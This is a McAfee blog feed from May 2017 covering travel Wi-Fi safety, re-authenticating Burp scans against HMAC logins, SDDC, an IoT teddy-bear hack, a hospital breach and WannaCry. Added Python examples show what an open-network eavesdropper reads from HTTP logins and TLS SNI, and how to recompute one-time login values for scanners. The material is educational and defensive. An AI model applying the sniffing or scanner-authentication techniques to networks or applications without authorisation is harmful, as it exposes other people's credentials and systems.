Traveling often means I’ll be surrounded by (and connecting to) unfamiliar Wi-Fi networks, which makes it especially important to have a smart security solution in place for all my devices. I rely on two different tools to keep my devices and my family’s devices safe while we’re on the road. One is a personal VPN, which keeps my connections safe, even if I need to log into an insecure Wi-Fi network. Personal VPNs encrypt online activities in both public and secure Wi-Fi networks, allowing users to surf the web safely and feel at peace knowing that sensitive information will be kept private.

If you tend to spend a lot of time browsing or working from your device while traveling, also install security apps that protect the device itself. It’s nice to have that extra layer of security, as these apps analyze the applications already installed on my phone that use my private information, and secure my data accordingly. If you’re traveling to cities where pickpocketing is common (or if you’re simply forgetful), many of the security apps also offer anti-theft protection that lets you back up, lock, and wipe the device remotely.

My family likes to travel to many different places in one vacation, which makes these apps perfect – since we’re bouncing between hotels or vacation rentals, we’re often surrounded by unknown networks. If your device has connected to an unknown network, you’re potentially at risk of picking up malware through it. I’ve found that it’s always smart to have extra protection if your devices have a higher chance of making an insecure connection.

While these tools are important to have, we’ve learned that technology can occasionally fail us. One of the most trustworthy ways to keep your devices safe while jet-setting around this summer is to understand what an insecure Wi-Fi connection looks like. If you can determine whether the connections around you are safe or not, it will potentially save you and your loved ones a massive headache down the road. Look out for these warning signs of an insecure network, and stay away from connecting if the network looks suspicious.

  • Check for Encryption. If the network does not require a WPA or WPA2 password, the connection is open, meaning unencrypted. You can check by looking at the network in your device’s Wi-Fi settings, which will show WPA or WPA2 security or say “open.” A shared password printed on a card for every guest offers little protection against the other people using that network, so treat those networks with the same caution.
  • HTTP vs. HTTPS. Make sure the pages you visit, and especially any page where you log in or pay, use HTTPS. Look at the start of the address: if it begins with http:// rather than https://, the page and anything you type into it travel in the clear, so log out and don’t enter anything sensitive.
  • Pay Attention to the Warning Signs. An SSL/TLS certificate warning means your browser could not verify that the site you reached is the site you asked for, which is exactly what an attacker intercepting traffic on a hostile network would trigger. Most people click through such warnings without a second thought; on an unfamiliar network, don’t.
  • Be Picky. Don’t let your devices connect to Wi-Fi networks automatically. Set laptops, tablets and smartphones to “forget” networks when you disconnect so they reconnect only when you choose to.
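
To make concrete what “lacks encryption” means on an open network, here is an added example (not code from the original post) that shows what a passive listener on the same Wi-Fi can read: everything in a plain-HTTP login, versus only the destination hostname in the very first message of an HTTPS connection. The HTTP request, the host name and the credentials in it are constructed for the example; the TLS ClientHello is generated locally by Python’s ssl module, so nothing is sent over the network.

```python
import ssl
import struct
from urllib.parse import parse_qsl

# Constructed sample of a login POST as it would cross an open (unencrypted)
# Wi-Fi network over plain HTTP. Host and credentials are made up.
CLEARTEXT_LOGIN = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: mail.example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 32\r\n"
    b"\r\n"
    b"user=alice&pass=correct-horse-42"
)


def eavesdrop_http(request: bytes) -> dict:
    """Anyone on the same open network sees the whole request; this parses
    the target host and the form fields the way a sniffer would."""
    head, _, body = request.partition(b"\r\n\r\n")
    host = None
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"host:"):
            host = line.split(b":", 1)[1].strip().decode("ascii")
    fields = dict(parse_qsl(body.decode("ascii")))
    return {"host": host, **fields}


def client_hello_for(hostname: str) -> bytes:
    """Produce a real TLS ClientHello without touching the network: drive the
    handshake through memory BIOs until it needs the server's reply, then
    take whatever the client has queued to send (the ClientHello record)."""
    ctx = ssl.create_default_context()
    incoming, outgoing = ssl.MemoryBIO(), ssl.MemoryBIO()
    tls = ctx.wrap_bio(incoming, outgoing, server_hostname=hostname)
    try:
        tls.do_handshake()
    except ssl.SSLWantReadError:
        pass  # expected: ClientHello written, now waiting for the server
    return outgoing.read()


def eavesdrop_tls(record: bytes):
    """What the same sniffer gets from an HTTPS connection: the one readable
    field in the ClientHello is the server_name (SNI) extension, type 0.
    Returns the hostname, or None if this is not a ClientHello record."""
    if len(record) < 9 or record[0] != 0x16 or record[5] != 0x01:
        return None
    body = record[9:]            # skip 5-byte record and 4-byte handshake headers
    pos = 2 + 32                 # legacy_version + random
    pos += 1 + body[pos]         # session_id (length-prefixed)
    (cs_len,) = struct.unpack("!H", body[pos:pos + 2])
    pos += 2 + cs_len            # cipher_suites
    pos += 1 + body[pos]         # compression_methods
    (ext_total,) = struct.unpack("!H", body[pos:pos + 2])
    pos += 2
    end = pos + ext_total
    while pos + 4 <= end:
        ext_type, ext_len = struct.unpack("!HH", body[pos:pos + 4])
        pos += 4
        if ext_type == 0:
            # ServerNameList: list_len(2) name_type(1) name_len(2) name
            (name_len,) = struct.unpack("!H", body[pos + 3:pos + 5])
            return body[pos + 5:pos + 5 + name_len].decode("ascii")
        pos += ext_len
    return None


if __name__ == "__main__":
    print("open Wi-Fi, HTTP :", eavesdrop_http(CLEARTEXT_LOGIN))
    print("open Wi-Fi, HTTPS:", eavesdrop_tls(client_hello_for("mail.example.test")))
```

The hostname that still leaks in the HTTPS case (the SNI field) is exactly the remaining gap a VPN closes on a hostile network: once traffic is tunnelled, the local network sees only the encrypted connection to the VPN endpoint.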

From the “secure Wi-Fi” you find at the airport and airplane, to whatever you can connect to in your hotel or vacation rental, it’s smart to have a secure solution if you plan to stay connected while traveling.  Know the warning signs of an insecure Wi-Fi connection and use a personal VPN and/or mobile security solution whenever possible to keep your data as protected as possible. Have a secure summer, and happy travels!

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post How Using A VPN Could Save Your Summer appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/mobile-security/vpn-mms-protection/feed/ 0
Setting Up Automated Scanning of Apps Using Custom Authentication, Part 1 https://securingtomorrow.mcafee.com/technical-how-to/setting-automated-scanning-apps-using-custom-authentication-part-1/ https://securingtomorrow.mcafee.com/technical-how-to/setting-automated-scanning-apps-using-custom-authentication-part-1/#respond Tue, 23 May 2017 00:56:52 +0000 https://securingtomorrow.mcafee.com/?p=74179 Automated security scanning has always been a challenge for applications that implement custom authentication mechanisms. Have you ever come across a scenario in which automated tools have failed to scan an application because of an authentication failure? Most automated scanners replay login requests to authenticate when a session expires during a scan. We encountered such …

Automated security scanning has always been a challenge for applications that implement custom authentication mechanisms. Have you ever come across a scenario in which automated tools have failed to scan an application because of an authentication failure? Most automated scanners replay login requests to authenticate when a session expires during a scan.

We encountered such a scenario on a recent engagement. The application being assessed had implemented client-side encryption and hashing techniques to map the user’s credentials to a one-time string. The tool was unable to deal with this situation because it replayed login credentials to the server for authentication. This behavior may result in an unsuccessful post-authentication scan, and the results will not cover all critical areas of the application.

Further, the application can perform obfuscation at the client side using multiple techniques. The logic of converting the credentials can differ from application to application. Most financial and health-care applications implement such a strategy to defend against password compromises. In this post, we will provide an approach to scanning applications that employ such techniques.

Case study

To demonstrate, we created a sample application that creates a hash-based message authentication code (HMAC) of the user password to convert the client password into a one-time string. A unique HMAC is sent for every login request even if the same combination of username and password is used.

The server receives this HMAC from the client and calculates its own HMAC using server-side parameters to verify the value received by the client.

Sequence of steps

  • The user requests the login page from the browser.
  • The web server responds and sends the login page, which has a random key embedded in a hidden HTML field. (This random key is used to calculate the HMAC of the password.)
  • The browser renders the login page.
  • The user provides the password and submits the form. The client-side script calculates the HMAC using the random key and the password. The resulting HMAC and the username are then sent to the web server in the form “HMAC(K,P1),” where K = random key and P1 = password entered by the user.
  • The server verifies the HMAC shared by the client and creates the session if “HMAC(K,P1)==HMAC(K,P2),” where P2 = password stored at server side.

The HMAC sequence of operations.

The application is deployed locally on port 8080:

The login screen.

To analyze the application’s behavior, let’s use an intercepting proxy tool such as Burp. The browser is configured to pass all traffic through Burp. The login page (loginPage.jsp) contains the one-time key, which is used to generate the HMAC. When the user enters their username and password and submits the form, the client-side script uses sha256_HMAC to convert the user’s password to an HMAC.

The “loginPage.jsp” HTML source with random key.

The sample application is designed so that the HTTP request for authentication is dependent on the random key, shown in the preceding image, along with the credentials. This prevents replaying the authentication request, as we discussed earlier.

The following screenshots depict two subsequent login requests using identical user credentials.

Login request 1:

The first login request in the Burp proxy.

  • Original password: “admin”
  • Random key: 278
  • Converted password (one-time string): /9qxmu3SEWdypUPBZi7F0hXzW3TYsvy5OXUKO3a9BXc=

Login request 2:

The second login request in Burp.

  • Original password: “admin”
  • Random key: 70
  • Converted password (one-time string): KyFY7vOslTcFhfkZCbLmw5j76Tj4bJXdFVnHiH/FQhw=

From the preceding screens we can see that the login requests have different values for the password parameter for the same user credentials. This poses a challenge to an automated scanning tool because it cannot simply replay the login sequence.

Burp provides the Burp Extender, in which we can add our own extension code, and it is handy for overcoming this issue. We will use this feature of Burp and write sample extension code that simulates the client-side encryption and hashing techniques to obtain the mapped one-time string. (For a quick introduction to writing Burp extensions, refer to http://blog.opensecurityresearch.com/2014/03/extending-burp.html.)

The extender script can be triggered whenever the session becomes invalid. The logic for checking session validity and when the extension script has to trigger can be configured using Burp’s session handling rules.
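To make the sequence of steps above and the extension’s job concrete, here is an added Python example (not the sample application or the extension from this post): a constructed stand-in for loginPage.jsp that issues a one-time key, the client-side HMAC transformation, the server-side check, and the key-extraction step a session handling action would run when the session becomes invalid. It assumes HMAC-SHA256 with the random key as the HMAC key and the password as the message, base64 output, the key returned in a hidden `key` field, and a server that accepts each key exactly once; the real argument order must be read from the application’s own client-side script.

```python
import base64
import hashlib
import hmac
import html
import re
import secrets

# Assumption: the sample app's sha256_HMAC uses the random key K as the HMAC key and
# the password as the message, and base64-encodes the digest. The real argument order
# must be read from the application's own client-side script.
def one_time_string(random_key: str, password: str) -> str:
    """HMAC(K, P) as the client computes it: the value sent in the password field."""
    digest = hmac.new(random_key.encode(), password.encode(), hashlib.sha256).digest()
    return base64.b64encode(digest).decode()


# ---- server side: a constructed stand-in for loginPage.jsp and its login handler ----
STORED_PASSWORDS = {"admin": "admin"}  # P2 per user (constructed sample data)
ISSUED_KEYS: set = set()               # keys embedded in pages that have not been used yet


def render_login_page(random_key: str) -> str:
    """Login form with the one-time key in a hidden field, as in the screenshot."""
    return (
        '<form method="POST" action="/login">\n'
        f'<input type="hidden" name="key" value="{html.escape(random_key)}">\n'
        '<input type="text" name="username">\n'
        '<input type="password" name="password">\n'
        '</form>'
    )


def new_login_page() -> str:
    """Each GET of the login page issues a fresh key (small integers, like 278 and 70)."""
    key = str(secrets.randbelow(1000))
    ISSUED_KEYS.add(key)
    return render_login_page(key)


def server_verify(random_key: str, username: str, received: str) -> bool:
    """Session is created only if HMAC(K, P1) == HMAC(K, P2) and K was issued and unused."""
    if random_key not in ISSUED_KEYS:
        return False                     # unknown or already-consumed key: a replayed request
    ISSUED_KEYS.discard(random_key)      # assumption: a key is good for exactly one attempt
    stored = STORED_PASSWORDS.get(username)
    if stored is None:
        return False
    expected = one_time_string(random_key, stored)
    return hmac.compare_digest(expected, received)   # constant-time comparison


# ---- what the Burp extension must do each time the session handling rule fires ----
KEY_FIELD = re.compile(r'name="key"\s+value="([^"]*)"')


def extract_random_key(login_page_html: str) -> str:
    """Pull the hidden key out of a freshly fetched loginPage.jsp."""
    match = KEY_FIELD.search(login_page_html)
    if match is None:
        raise ValueError("random key not found in login page")
    return html.unescape(match.group(1))


def build_login_body(login_page_html: str, username: str, password: str) -> dict:
    """Recreate the client-side transformation: the form body Burp should send instead
    of the recorded one, whose HMAC belongs to a key the server no longer accepts."""
    key = extract_random_key(login_page_html)
    return {"username": username, "key": key, "password": one_time_string(key, password)}


def simulate_login(username: str, password: str) -> bool:
    """Full round trip: fetch page -> compute one-time string -> server verifies."""
    page = new_login_page()
    body = build_login_body(page, username, password)
    return server_verify(body["key"], body["username"], body["password"])


def replay_is_rejected() -> bool:
    """Replaying a recorded login request (same key, same HMAC) must fail the second time,
    which is exactly why a scanner that re-sends the captured request loses its session."""
    page = new_login_page()
    body = build_login_body(page, "admin", "admin")
    first = server_verify(body["key"], body["username"], body["password"])
    second = server_verify(body["key"], body["username"], body["password"])
    return first and not second


if __name__ == "__main__":
    print("fresh login:", simulate_login("admin", "admin"))      # True
    print("wrong password:", simulate_login("admin", "wrong"))   # False
    print("replay rejected:", replay_is_rejected())              # True
```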

The scope for this rule can be applied on any Burp tools—Intruder, Scanner, Repeater, Proxy, etc. If the proxy tool is selected in the scope section, any request from the proxy tool will be subjected to the configured session handling rule.

To define the scope of a session handling rule, navigate to Project options -> Session Handling Rules -> Add/Edit -> Scope:

The scope tab and the tools for which the session handling rule will be applicable.

The technique we have shown in this post can be used with any proxy-aware automated scanning tools. Creating the Burp extension allows you to scan the application using Burp as well as other third-party tools.

Proxying the automated tool via Burp Proxy can be useful for performing robust post-authentication scans. Burp ensures that there is a valid session throughout the scanning process. This technique can perform scans using Burp tools such as Scanner or Intruder as well as third-party tools such as sqlmap. In our next post, we will explain our step-by-step procedure with the sample Burp extension code.

SDDC 101: The Why, the What, and the How
https://securingtomorrow.mcafee.com/business/cloud-security/sddc-101-the-why-the-what-and-the-how/
Mon, 22 May 2017 20:15:28 +0000

The Software Defined Data Center (SDDC) has fundamentally changed how IT delivers infrastructure and services. SDDC rethinks traditional ways of using virtualized resources by adding virtual networks (SDN) and virtualized storage (SDS) to virtual compute as a better way to build data centers, improve security and keep costs down.

The included automation and orchestration of resources has made infrastructure operations smooth and, more importantly, has enabled security to be “built-in” to the architecture.  This is in stark contrast to traditional data centers, with physical infrastructure, where security was an afterthought.

To evaluate the impact of the move to SDDC, McAfee, in partnership with VMware, sponsored the Osterman Research report “The Why, the What and the How of the Software-Defined Data Center,” which explains the nuts and bolts of SDDC, provides a deeper understanding of its value to your business as it moves to the cloud, and shows how it improves your security posture.

From the research, we see that while many organizations have virtualized their servers, they haven’t yet embraced the full virtualization of a software-defined data center:

Figure 1: Percentage of Servers that are Virtualized, 2017 and 2019. Source: Osterman Research, Inc.

And while only 3% have moved to SDDC, there is great intention to do so:

Figure 2: “Does your organization plan to transform your data center(s) into Software-Defined Data Centers?” Source: Osterman Research, Inc.

So, Why SDDC?

Our survey respondents confirmed what we believed: an SDDC improves operational efficiency, creates a more secure data center and reduces costs.

Figure: Reasons That Organizations Want to Move to an SDDC. Source: Osterman Research, Inc.

These business benefits help organizations as they transition their infrastructure into a cloud-ready agile environment for both private and hybrid cloud.

Probably the greatest benefit of an SDDC is its ability to transform the data center from being a slow-to-support-the-business department of saying “no” to an agile business driver, where the department says “yes” to quickly deploying applications and services, truly helping to grow the business objectives of your company. With the agile infrastructure of an SDDC, you can elastically scale as demand on your applications increases. An SDDC allows you to extend and manage applications across private and public clouds so you can optimize based on your current and evolving needs.

How does SDDC Work and Improve Security?

With SDDC, the three main pillars of the data center – compute, networking and storage – are virtualized. This virtualized environment provides a high degree of automation and agility. Traditionally, virtualized architectures have been drawn by expedience, which means that managing a virtualized data center required lots of interaction with many moving parts. However, these moving parts are not integrated and are not aware that they have been virtualized. SDDC rethinks and redraws functional boundaries by moving intelligence from lower layers up into the VM platform, thus improving automation, management and security.

This new virtual and dynamic data center architecture introduces new security and compliance considerations as well. You will need complete visibility into all your workloads as they are provisioned so you can know what needs to be secured. In addition, as you now have east-west traffic flows between your VMs, inspection of that traffic is key. McAfee Data Center and Cloud Defense solutions help secure the new infrastructure of an SDDC, all within the same management as your traditional security. Integrated, dynamic protection technologies match the agility of your new data center infrastructure to protect against advanced threats and maintain compliance, including the ability to monitor east-west traffic flows inside the SDDC environment.

The bottom line? Transforming your traditional data center into an SDDC offers numerous benefits, including significant improvements to data center security. The SDDC is ready for prime time and offers substantial advantages over traditional data center approaches. Are you ready to grab hold of the opportunity?

To learn more, download the whitepaper “The Why, the What and the How of the Software-Defined Data Center.”

Sixth-grader weaponizes smart teddy bear, hacks security audience’s Bluetooth
https://securingtomorrow.mcafee.com/business/neutralize-threats/sixth-grader-weaponizes-smart-teddy-bear-hacks-security-audiences-bluetooth/
Mon, 22 May 2017 17:10:57 +0000

If yet another cybersecurity expert wanted to warn the general public about the risks associated with the Internet of Things (IoT), it is likely the warning would go in one ear and out the other. But when a sixth-grader hacks an audience of security experts and “weaponizes” his smart teddy bear, it might just snag the attention of parents who have disregarded warnings about the dangers and bought internet-connected toys for their kids anyway.

At the International One Conference in the Netherlands on May 16, 11-year-old Reuben Paul set out to ensure that “the Internet of Things does not end up becoming the Internet of Threats.” Judging by security experts’ awed reactions on Twitter, Paul made a lasting impression.

“From airplanes to automobiles, from smart phones to smart homes, anything or any toy can be part of the Internet of Things (IoT),” Paul said during his keynote, Mutually Symb-IoT-ic Security. On stage at the World Forum in The Hague, he added, “From terminators to teddy bears, anything or any toy can be weaponized.”

He then used his smart teddy bear, Bob, to prove his point. Paul plugged a Raspberry Pi into the bear, which is connected to the cloud via Wi-Fi and Bluetooth, to send and receive messages. He scanned for Bluetooth devices. AFP reported that “to everyone’s amazement, including his own,” he “suddenly downloaded dozens of numbers including some of the top officials.”

Using Python, he “hacked into this bear via one of the numbers to turn on one of its (LED) lights and record a message from the audience.”

Live demos are great when they work as intended, but it surely is nerve-wracking for the speaker.

Young Paul, aka @RAPst4r, tweeted that his “heart was going boom boom before the bear’s heart went blink blink.”

“Most internet-connected things have a Bluetooth functionality. … I basically showed how I could connect to it, and send commands to it, by recording audio and playing the light,” Paul told AFP.

“IoT home appliances, things that can be used in our everyday lives, our cars, lights, refrigerators, everything like this that is connected in our homes, could be used and weaponized to spy on us, or even harm us,” he added.

Internet-connected devices can be weaponized to steal passwords or other sensitive information, used as remote surveillance or to determine a person’s location. A smart toy could be abused to tell a kid, “Meet me at this location and I will pick you up.”

His Kung Fu is strong and not just the digital kind. Paul was the youngest person in America to have received the Shaolin Do Kung Fu Black Belt.

This Austin, Texas, sixth-grade “cyber ninja” is also founder and CEO of CyberShaolin, a non-profit organization with a mission “to educate, equip and empower kids with the knowledge of cybersecurity dangers and defenses, using videos and games.” These are videos and games that Paul “develops when he is done with his homework or his sports training.”

Paul has shown an aptitude in IT since he was six. He “shocked” his dad, IT expert Mano Paul, by first hacking a toy car before moving on to exploit vulnerabilities in more complex toys. His father said, “It means that my kids are playing with time-bombs that over time somebody who is bad or malicious can exploit.”

This isn’t the first time his son has presented at security conferences. In 2014, at age 8, Paul delivered a talk at DerbyCon. And when he was only a third-grader, Paul gave a closing keynote at the 2014 Houston Security Conference and spoke at the (ISC)2 Congress. Back then, he reportedly wanted to become a cyber spy and had already become founder and CEO of Prudent Games. At age 9, he was dubbed the next generation of security at the RSA conference and a child prodigy.

It’s exciting to think what he might do next after live-hacking his smart teddy bear. Be it his age or hacking a toy, Paul hopes people won’t miss the message:

This article was written by Ms. Smith from NetworkWorld and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

Over 7,000 Patients’ Data Compromised in Bronx Lebanon Hospital Data Breach
https://securingtomorrow.mcafee.com/business/7000-patients-data-compromised-bronx-lebanon-hospital-data-breach/
Fri, 19 May 2017 16:30:01 +0000

While all of us were focusing on the massive WannaCry ransomware attack that hit more than 150 countries last Friday, other breaches managed to fly under the radar, including one large data breach that impacted the Bronx Lebanon Hospital Center in New York City. The breach exposed the records of over 7,000 patients.

What kind of medical records were compromised? Unfortunately, a lot. Specifically, patients’ mental health and medical diagnoses, HIV statuses, sexual assault and domestic violence reports, as well as names, home addresses, and social security numbers. The actual length of time these records were left exposed is not known, but it seems that anyone who was a patient at the hospital between 2014 and 2017 is potentially at risk.

How did this breach happen? Some sources believe a misconfigured Rsync backup server hosted by the third-party records management vendor iHealth Solutions was left exposed. This instance is indicative of a larger trend in the industry: institutions adopt new technology architectures, yet don’t take steps to protect the legacy systems they transitioned from. Turning off access to a system does not make it secure, especially when it is still connected to the network and no longer patched and maintained the way it used to be.
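As an added illustration of the kind of exposure described above (a constructed example, not the hospital’s or the vendor’s configuration): a Python audit that parses an rsyncd.conf and flags modules exported without `auth users`, without `hosts allow`, listed to anonymous clients, or writable, next to a hardened module that passes. The module names, paths and the 10.20.0.0/24 range are made-up sample values.

```python
import configparser
import ipaddress

# Constructed rsyncd.conf (not from any real deployment): "backups" is exported the risky
# way (anonymous, reachable from anywhere, listed); "backups_hardened" shows the fix.
SAMPLE_RSYNCD_CONF = """\
[backups]
path = /srv/backups
comment = nightly record exports
read only = yes
list = yes

[backups_hardened]
path = /srv/backups
read only = yes
list = no
auth users = backup-agent
secrets file = /etc/rsyncd.secrets
hosts allow = 10.20.0.0/24
hosts deny = *
"""

FALSE_VALUES = ("no", "false", "0")


def parse_rsyncd_conf(text: str) -> dict:
    """rsyncd.conf is INI-like: one [module] section per exported directory."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(text)
    return {name: dict(parser.items(name)) for name in parser.sections()}


def exposed_to_internet(hosts_allow: str) -> bool:
    """True if any 'hosts allow' entry is a wildcard or a non-private network.
    Hostname patterns cannot be evaluated offline and are skipped."""
    for entry in hosts_allow.replace(",", " ").split():
        if entry == "*":
            return True
        try:
            network = ipaddress.ip_network(entry, strict=False)
        except ValueError:
            continue
        if not network.is_private:
            return True
    return False


def audit_module(options: dict) -> list:
    """Findings for one module. rsync daemon defaults when a key is absent:
    read only = yes, list = yes, and no host restriction at all."""
    findings = []
    if not options.get("auth users", "").strip():
        findings.append("no 'auth users': anonymous clients can pull the module")
    hosts_allow = options.get("hosts allow", "").strip()
    if not hosts_allow:
        findings.append("no 'hosts allow': reachable from any address")
    elif exposed_to_internet(hosts_allow):
        findings.append("'hosts allow' admits non-private addresses")
    if options.get("read only", "yes").strip().lower() in FALSE_VALUES:
        findings.append("writable module: clients can overwrite backups")
    if options.get("list", "yes").strip().lower() not in FALSE_VALUES:
        findings.append("module is listed: anyone can enumerate it")
    return findings


def audit_rsyncd_conf(text: str) -> dict:
    """Map each module name to its list of findings (empty list = passes)."""
    return {name: audit_module(opts) for name, opts in parse_rsyncd_conf(text).items()}


if __name__ == "__main__":
    for module, findings in audit_rsyncd_conf(SAMPLE_RSYNCD_CONF).items():
        print(f"[{module}]", "OK" if not findings else "")
        for finding in findings:
            print("   -", finding)
```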

Here are a few takeaways to remember when building a security strategy and preventing future attacks:

1. Make data flows a priority.

Identifying your data flows not only tells you what data is involved and who touches it (which can help with your Data Loss Protection and Identity Management initiatives). It also gives you visibility into which systems talk to each other and how. That is critical to know when architecting a security solution, because the initial attack vector and the final malware that exfiltrates data or disrupts workflow often do not share the same protocols or application stacks.

2. Have a response strategy that involves your emergency management and risk group.

The former will aid in containing and recovering from the clinical and operational impact of the incident, while the latter is the conduit to your cyber liability insurance policy, which will be one of the resources providing services like incident response, call center management, lawsuit protections, etc.

3. Advise patients to get insurance providers involved.

While credit monitoring is helpful in response to a medical data theft scenario, it is good practice for impacted patients to follow up with their insurance providers, who can provide claim processing information to make sure patients are not victims of medical fraud. Additionally, prompt patients to update their passwords for patient portals with doctors, hospitals, and insurance companies.

To gain further insight on how to protect yourself from breaches like this and to stay up-to-date on all cybersecurity news, make sure to follow @McAfee and @McAfee_Business.

The Week That Was In Internet History
https://securingtomorrow.mcafee.com/consumer/family-safety/week-internet-history/
Thu, 18 May 2017 18:02:33 +0000

From the wheel to the internet, we have come a long way in terms of technological progress. While the invention of the wheel set human progress in motion, the industrial revolution with its assembly line production gave it a boost and now the information revolution has catapulted us to the digital age.

This week we observed Internet Day on May 17. Internet Day aims to show the possibilities offered by new technologies to improve people’s standard of living by giving them a better understanding of technology and its functions. Ironically, we also saw one of the most prolific ransomware attacks in history, ‘WannaCry’.

While the digital revolution has disrupted industries and eased the way we live, work and think, it has also led to losses in the form of identity theft, malware and the topic of this discussion, ransomware. Today, innumerable companies collect information about us, the consumers, for their research and are susceptible to breaches.

As Spiderman says (Peter Parker to you), “With great power comes great responsibility.” Cliché, I know, but true at a time like this. In a day where big data is instrumental in winning opinions, it is necessary that each one of us know how to use technology safely and responsibly. Data privacy and cybersecurity form the core pillar of the privilege of technology, and so let us refresh our understanding of internet security. In order to stay prepared and keep your personal data secure, follow these tips:

  1. Back up your files: Always make sure your files are backed up. That way, if they become compromised in a ransomware attack, you can wipe your disk drive clean and restore the data from the backup.
  2. Update your devices: There are a few lessons to take away from WannaCry, but making sure your operating system is up-to-date needs to be near the top of the list. The reason is simple: nearly every software update contains security improvements that help secure your computer and remove the means for ransomware variants to infect a device.
  3. Schedule automatic updates: It’s always a good practice to set your home systems to apply critical Windows Security Updates automatically. That way, whenever there is a vulnerability, you receive the patch immediately.
  4. Apply any Windows security patches that Microsoft has sent you: If you are using an older version of Microsoft’s operating systems, such as Windows XP or Windows 8, click here to download emergency security patches from Microsoft.

The recent WannaCry attack is perhaps one of the largest and most widespread ransomware attacks in recent history, with India being a prime target. The most affected were those running old and unpatched software, which threatens more than just consumers’ data. While there is no silver bullet in security, this attack does serve as a reminder for consumers to prepare for ransomware attacks.

Stay safe. Together is Power!

WannaCry: When the Theoretical Becomes Real
https://securingtomorrow.mcafee.com/business/wannacry-theoretical-becomes-real/
Thu, 18 May 2017 01:05:23 +0000

I’ve spent many years talking to audiences – corporate customers, government leaders, and everyday people – about cyberthreats both real and possible. But what happened over last weekend with the “WannaCry” threat feels like a point at which “future threats” become “now threats” in many people’s minds.

We’ve all known for decades about hackers, information thefts, computer viruses etc. But when a hospital’s information systems get locked, and lives are at stake, think pieces about the “Future of Cybersecurity” don’t seem so distant. The future is now.

The ongoing WannaCry attack, which started last Friday, is the first time we’ve seen worm tactics combined with ransomware on a major scale. The outbreak has already infected 350,000 victims in more than 150 countries.

WannaCry’s success comes down to its ability to amplify one attack through the vulnerabilities of many machines on the network, making the impact greater than what we’ve seen from traditional ransomware attacks. (See Steve Grobman’s blog on the intricacies of the attack here).

We are protecting you, at Day Zero and beyond

McAfee technology provided Day Zero protection against the WannaCry attack, not just at the endpoint but across many aspects of an integrated security architecture.  More than ever, threats like WannaCry remind us that an integrated defense is the best defense because it enables you to protect, detect and respond to the newest and most challenging threats:

  • McAfee Endpoint Security (ENS) 10.2 (or later) running Dynamic Application Containment (DAC) in Secure mode gave full Day Zero protection against WannaCry.
  • ENS, Threat Intelligence Exchange (TIE) and Advanced Threat Defense (ATD) operate together as a zero touch, closed loop security defense system. This system provided effective prevention, detection and response of the attacks at Day Zero as ATD identified the attacks as malicious, allowing the McAfee integrated defense architecture to automatically update defenses across the remaining environment.
  • McAfee Active Response (MAR) delivered trace data that revealed malicious activity at Day Zero, helping responders identify the attack and update defenses across the environment.
  • McAfee Network Security Platform: our IPS used its Signatureless and protocol anomaly engine to detect the backdoor planted on compromised machines, and has updated signatures to protect against the SMB RCE attacks as well as the Eternal* tools.

For customers on older endpoint technology, McAfee researchers analyzed samples of the ransomware immediately upon detection then updated McAfee Global Threat Intelligence (GTI) and released an emergency DAT and new HIPS signatures for extra coverage.  I strongly encourage all our customers to join the millions of end users who have already upgraded to McAfee Endpoint Security v10.5 to enjoy the advanced technology and zero-day protection capabilities it provides.

The Big Picture

Though there is an immediate threat to be met, it’s important to keep an eye on the Big Picture. Now, more than ever, the “new threat, new widget” approach must evolve. It’s not sustainable to continue frantically filling cracks in a foundation that is sinking; we must begin building the proper foundation to begin with.

McAfee’s belief is that an effective defense is built on a dynamic cybersecurity platform that is both open and integrated. Open, so it can quickly accept new technologies that protect against even the most creative adversaries; and integrated in that technologies work together as a cohesive defense.

Those integrated defenses were on clear display in protecting our customers during this worldwide episode.  Leveraging an automated security system that protects, detects and corrects in real time allows users to both free up resources and thwart advanced attacks.  An integrated endpoint platform ensures that people have both the latest technologies today and the ability to add the newest technology year after year.  As a result, users no longer have to choose between the best technology and the most manageable – they can have both.

Together is power.

To read more about how McAfee products protect against WannaCry, read “How to Protect Against WannaCry Ransomware in a McAfee Environment.”

How to Protect Against WannaCry Ransomware in a McAfee Environment
https://securingtomorrow.mcafee.com/mcafee-labs/protect-wannacry-ransomware-mcafee-environment/
Thu, 18 May 2017 00:37:23 +0000

This post was updated on May 31 with links to three McAfee community videos concerning WannaCry ransomware. 

WannaCry Ransomware – McAfee ATP: Highlighting the value of Adaptive Threat Protection
WannaCry Ransomware – DAC/ATD: Highlighting the value of malware analytics
WannaCry Ransomware – McAfee MAR: Highlighting the value of Cloud Threat Analytics

WannaCry is a ransomware family targeting Microsoft Windows. On Friday May 12, a large cyberattack based on this threat was launched. At this time, it is estimated that more than 250,000 computers in 150 countries have been infected, each demanding a ransom payment.

The initial attack vector is unclear, but an aggressive worm helps spread the ransomware. A critical patch was released by Microsoft on March 14 to remove the underlying vulnerability in supported versions of Windows, but many organizations have not yet applied this patch.

Computers running unsupported versions of Windows (Windows XP, Windows Server 2003) did not have an available patch, but Microsoft released a security patch for Windows XP and Windows Server 2003 over the weekend.

Detailed technical analyses of the WannaCry ransomware can be found here (posted May 12) and here (May 14).

How McAfee products can protect against WannaCry ransomware

McAfee is leading the way enterprises protect against emerging threats such as WannaCry ransomware, remediate complex security issues, and combat attacks with an intelligent end-to-end security platform that provides adaptable and continuous protection as a part of the threat defense lifecycle.

McAfee had zero-day protection for components of the initial WannaCry attack in the form of behavioral, heuristic, application control, and sandbox analyses. This post provides an overview of those protections with the following products:

  • McAfee Network Security Platform (NSP)
  • McAfee Host Intrusion Prevention (HIPS)
  • McAfee Endpoint Protection (ENS)
  • McAfee VirusScan Enterprise (VSE)
  • McAfee Advanced Threat Defense (ATD)
  • McAfee Web Gateway (MWG)
  • McAfee Threat Intelligence Exchange (TIE)

Frequently updated technical details can be found in the McAfee Knowledge Center article KB89335.

 

McAfee Network Security Platform (NSP)

McAfee NSP is one product that quickly responds to prevent exploits and protect assets within networks. The McAfee NSP team works diligently to develop and deploy user-defined signatures (UDS) for critical matters. Within a 24-hour period, several UDS were created and uploaded for customers to deploy on their network sensors. In this case, the UDS explicitly targeted the exploit tools EternalBlue, EternalRomance (SMB Remote Code Execution), and DoublePulsar. Related indicators of compromise were also released, which can be added to a blacklist to block potential threats associated with the original Trojan.

NSP signatures:

